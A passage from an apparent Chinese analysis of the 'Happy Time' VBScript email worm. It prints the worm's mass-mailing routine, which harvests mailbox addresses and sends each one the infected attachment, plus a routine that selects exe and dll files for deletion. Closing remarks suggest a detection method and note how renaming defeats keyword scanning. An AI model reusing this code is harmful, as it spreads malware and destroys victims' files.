|
|
Sub Tsend()
’发带毒邮件
Dim Od, MS, MM, a, m
Set Od = CreateObject("Scripting.Dictionary")
MConnect MS, MM
MM.FetchSorted = True
MM.Fetch
For i = 0 To MM.MsgCount - 1
MM.MsgIndex = i
a = MM.MsgOrigAddress
If Od.Item(a) = "" Then
Od.Item(a) = MM.MsgSubject
End If
Next
For Each m In Od.Keys
MM.Compose
MM.MsgSubject = "Fw: " & Od.Item(m)
’设置邮件标题
MM.RecipAddress = m
’此邮件的当前的目标邮件地址
MM.AttachmentPathName = Gsf & "\Untitled.htm"
’添加附件Windows\Untitled.htm
MM.Send
’发送!
Next
MS.SignOff
End Sub
’******************************************************************
Function Er()
’设置的错误陷阱,避免程序崩溃,严谨的风格值得学习
If Err.Number = 0 Then
Er = False
Else
Err.Clear
Er = True
End If
End Function
’******************************************************************
Function IsDel(S)
’此函数查看当前文件是否是要删除的文件类型
If Mid(S, 4, 1) = 1 Then
’看S的第四个字符是否是1——即是0001(exe和dll)
IsDel = True
’如是,返回True,以备删除
Else
IsDel = False
’如不是,返回False
End If
End Function
’******************************************************************
于安全上的考虑,上面只登出了技术上比较新颖和重要的几个模块供大家研究和学习之用。从代码中大家可以看到,“欢乐时光”也采用了“爱虫”的FileSystemObject(文件系统对象)的技术,这也几乎是所有VBS邮件病毒必不可少的部分。因此如果杀毒软件监视所有Html和Vbs中的FileSystemObject关键字,几乎可以查出所有和潜在的变种(虽然可能会将某些良性的超文本和Vbs误报,但还是“宁可错杀一千,不可放过一毒”。如果仅监视关键字,如“爱虫”的“I love you”,“欢乐时光”的“Happy Time",造毒者只要将其改掉即可,再将邮件标题、内容和源码中的变量名替换一下,具有“智能查毒”的杀毒软件们也只有装聋作哑,望毒兴叹了。
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] 下一页
|
|
|
|
|
|
|
|
 |
|
